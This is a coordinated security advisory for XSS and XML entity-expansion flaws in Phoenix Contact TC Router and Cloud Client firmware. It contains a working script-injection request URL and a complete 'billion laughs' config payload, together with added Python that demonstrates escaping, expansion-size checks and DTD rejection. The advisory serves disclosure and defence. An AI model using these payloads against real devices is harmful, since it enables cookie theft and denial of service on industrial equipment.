
Phoenix Contact TC Cloud / TC Router 2.x XSS / Memory Consumption

Posted Aug 14, 2023
Authored by T. Weber, S. Stockinger, A. Resanovic, T. Etzenberger | Site cyberdanube.com

Phoenix Contact TC Router 3002T-4G* versions prior to 2.07.2, TC Cloud Client 1002-4G* versions prior to 2.07.2, and Cloud Client 1101T-TX/TX versions prior to 2.06.10 suffer from reflected cross-site scripting and excessive memory consumption (XML entity expansion) vulnerabilities.

tags | exploit, denial of service, vulnerability, xss
advisories | CVE-2023-3526, CVE-2023-3569
SHA-256 | a587bb9bbd0a7bc6b304a09099ebed341f33e4b48fa43bcad73ec180522c55d2

St. Pölten UAS
-------------------------------------------------------------------------------
title| Multiple Vulnerabilities
product| Phoenix Contact TC Cloud Client 1002-4G*,
| TC Router 3002T-4G*, Cloud Client 1101T-TX/TX
vulnerable version| <2.07.2, <2.07.2, <2.06.10
fixed version| 2.07.2, 2.07.2, 2.06.10
CVE number| CVE-2023-3526, CVE-2023-3569
impact| Medium
homepage| https://www.phoenixcontact.com/
found| 2023-05-04
by| A. Resanovic, S. Stockinger, T. Etzenberger
| These vulnerabilities were discovered during research at
| St. Pölten UAS, supported and coordinated by CyberDanube.
|
| https://fhstp.ac.at | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"At Phoenix Contact, our approach is innovative, sustainable, and based on
partnership. This applies to how we deal with employees as well as with our
customers. We are also conscious of our social and environmental responsibility
and we act accordingly. With the vision of the All Electric Society, we also
want to empower our customers to act more sustainably by enabling the
comprehensive electrification, networking, and automation of all sectors of the
economy and infrastructure with our products and solutions."

Source: https://www.phoenixcontact.com/en-us/ueber-uns


Vulnerable versions
-------------------------------------------------------------------------------
TC Router 3002T-4G* / <2.07.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggered in the license
viewer of the device. It can be used to execute attacker-controlled script in
the context of a user's browser; session cookies may also be stolen this way.

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
By uploading a crafted configuration file containing nested XML entity
declarations, the parser is made to expand the entities to a huge size. The
resulting memory consumption slows down all other processes on the device.

Proof of Concept
-------------------------------------------------------------------------------
1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
The reflected cross-site scripting vulnerability can be triggered by using the
following GET request:
https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>
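
The PoC request above carries the payload in the txt parameter; the leading
15"> suggests the value is echoed inside a quoted attribute, so the double quote
closes the attribute value, the > closes the tag, and the rest is parsed as
markup. (The advisory's payload alerts the literal string "document.cookie";
the injection point, not the alert text, is what matters.) The following
Python snippet is an added example, not code from the advisory or from
Phoenix Contact: it reconstructs that attribute context as a hypothetical
handler, shows the same template with context-aware escaping, and carries a
check a tester can run against both. The placeholder host 192.0.2.1 and the
render_* function names are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: the advisory's PoC request with $IP replaced by a
# placeholder address from the documentation range.
POC_URL = ('https://192.0.2.1/cgi-bin/p/license'
           '?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script>')


def query_params(url: str) -> dict:
    """Split the query string the way a CGI handler sees it (first value wins)."""
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in parsed.items()}


def render_license_vulnerable(pkg: str, txt: str) -> str:
    """Hypothetical reconstruction of the flaw: txt is interpolated into a
    quoted attribute with no escaping, so a value starting with '">' closes
    the attribute and the tag, and everything after it becomes live markup."""
    return (f'<input type="hidden" name="txt" value="{txt}">'
            f'<h1>License: {pkg}</h1>')


def render_license_fixed(pkg: str, txt: str) -> str:
    """Same template with context-aware escaping: html.escape(quote=True)
    turns ", ', <, > and & into entities, so the value cannot leave the
    attribute it was placed in."""
    safe_txt = html.escape(txt, quote=True)
    safe_pkg = html.escape(pkg, quote=True)
    return (f'<input type="hidden" name="txt" value="{safe_txt}">'
            f'<h1>License: {safe_pkg}</h1>')


def reflects_script(page: str) -> bool:
    """Verification check: a literal <script> tag in the response means the
    reflected input escaped its attribute context."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    params = query_params(POC_URL)
    for name, render in (("vulnerable", render_license_vulnerable),
                         ("fixed", render_license_fixed)):
        page = render(params["pkg"], params["txt"])
        print(f"{name}: reflects_script={reflects_script(page)}\n  {page}")
```

Run against a real device, the same check reduces to fetching the PoC URL
and grepping the response body for an unescaped <script> tag; on a patched
firmware the reflected value should come back entity-encoded.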

2) Excessive Memory Consumption (Billion Laughs Attack) CVE-2023-3569
The following configuration file can be used to exploit the binary
"/usr/bin/xmlconfig", which resolves entity references when a configuration
file is uploaded:
===============================================================================
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
===============================================================================

The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
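
The payload above is small (well under a kilobyte), but each of the nine
entity levels references the previous one ten times, so &lol9; expands to
3 * 10^9 bytes of "lol". The following Python example is added here and is not
code from the advisory or from Phoenix Contact: it rebuilds the payload for any
depth and fan-out, computes the expansion size from the DTD alone (without
ever expanding it), and shows the two checks a configuration importer should
apply before handing the file to a parser: refuse a DOCTYPE outright, or, if
entities must be allowed, bound the amplification factor. The function names,
the 10x amplification limit and the benign sample config are assumptions.

```python
import re
import xml.etree.ElementTree as ET

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")


def build_billion_laughs(depth: int = 9, fanout: int = 10) -> str:
    """Constructed copy of the advisory's payload, generalised: depth nested
    entities, each referencing the previous one fanout times."""
    decls = ['<!ENTITY lol "lol">', '<!ELEMENT lolz (#PCDATA)>']
    prev = "lol"
    for i in range(1, depth + 1):
        name = f"lol{i}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY {name} "{refs}">')
        prev = name
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n'
            + "\n".join(decls)
            + f"\n]>\n<lolz>&{prev};</lolz>\n")


def entity_expansion_sizes(doc: str) -> dict:
    """Byte length each internal general entity would expand to, computed
    from the declarations alone; the parser would have to allocate this."""
    decls = dict(ENTITY_DECL.findall(doc))
    sizes = {}

    def size_of(name, stack=()):
        if name in sizes:
            return sizes[name]
        if name in stack:
            raise ValueError(f"recursive entity reference: {name}")
        if name not in decls:
            return 1  # predefined entities (&lt; &amp; ...) expand to one char
        value = decls[name]
        literal = len(ENTITY_REF.sub("", value))
        total = literal + sum(size_of(ref, stack + (name,))
                              for ref in ENTITY_REF.findall(value))
        sizes[name] = total
        return total

    for name in decls:
        size_of(name)
    return sizes


def expanded_document_size(doc: str) -> int:
    """Expanded size of the document body (everything after the DTD)."""
    sizes = entity_expansion_sizes(doc)
    body = doc.split("]>", 1)[1] if "]>" in doc else doc
    return (len(ENTITY_REF.sub("", body))
            + sum(sizes.get(ref, 1) for ref in ENTITY_REF.findall(body)))


def amplification_factor(doc: str) -> float:
    """Expanded bytes per input byte; the quantity an importer should bound."""
    return expanded_document_size(doc) / len(doc)


def parse_config(doc: str, allow_dtd: bool = False,
                 max_amplification: float = 10.0) -> ET.Element:
    """Hardened import path (assumed policy). Default: a device configuration
    has no legitimate use for a DTD, so reject one before parsing. If a DTD
    must be tolerated, reject anything whose computed expansion exceeds
    max_amplification times the input size; parsing only happens after both
    checks have passed."""
    if re.search(r"<!DOCTYPE", doc, re.IGNORECASE):
        if not allow_dtd:
            raise ValueError("DTD/entity declarations not allowed in config files")
        factor = amplification_factor(doc)
        if factor > max_amplification:
            raise ValueError(f"entity expansion factor {factor:.0f} exceeds limit")
    return ET.fromstring(doc)


if __name__ == "__main__":
    payload = build_billion_laughs()
    print(f"input bytes: {len(payload)}, expanded bytes: "
          f"{expanded_document_size(payload)}, "
          f"amplification: {amplification_factor(payload):.0f}x")
    try:
        parse_config(payload, allow_dtd=True)
    except ValueError as exc:
        print("rejected:", exc)
```

The size computation is the useful part for a reviewer: it tells you how
much memory a parser would commit before any parsing happens, which is why the
advisory's nine-level file is enough to starve an embedded device. Note that
recent libexpat versions ship their own amplification limit, but a firmware's
bundled parser cannot be assumed to have it, so the check belongs in the
upload handler.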


Solution
-------------------------------------------------------------------------------
Update to the latest available firmware version.

Workaround
-------------------------------------------------------------------------------
None.


Recommendation
-------------------------------------------------------------------------------
Phoenix Contact customers are advised to upgrade the firmware to the latest
available version.


Contact Timeline
-------------------------------------------------------------------------------
2023-05-16: Contacting vendor via psirt@phoenixcontact.com
2023-05-17: Vendor informed internal product team.
2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
2023-05-19: Vendor needs more time to fix the issues.
2023-06-15: Vendor asked for an explanation of the issues as they could not
reproduce them; sent screenshots and more PoCs to the vendor and
offered an MS Teams call to clarify the issues.
2023-06-16: Scheduled a call for 2023-06-19.
2023-06-19: Clarified issues and further timeline for the coordination.
Vendor proposed to release the firmware on 2023-07-13.
2023-07-04: Vendor stated that the release had to be shifted to after July;
new release date 2023-08-08. Confirmed the date.
2023-07-13: Received CVE numbers from vendor.
2023-07-18: Received firmware versions from vendor.
2023-07-23: Vendor released the fixed firmware versions.
2023-08-08: Coordinated release of security advisory.

Web: https://www.fhstp.ac.at/
Twitter: https://twitter.com/fh_stpoelten
Mail: mis at fhstp dot ac dot at

EOF T. Weber / @2023

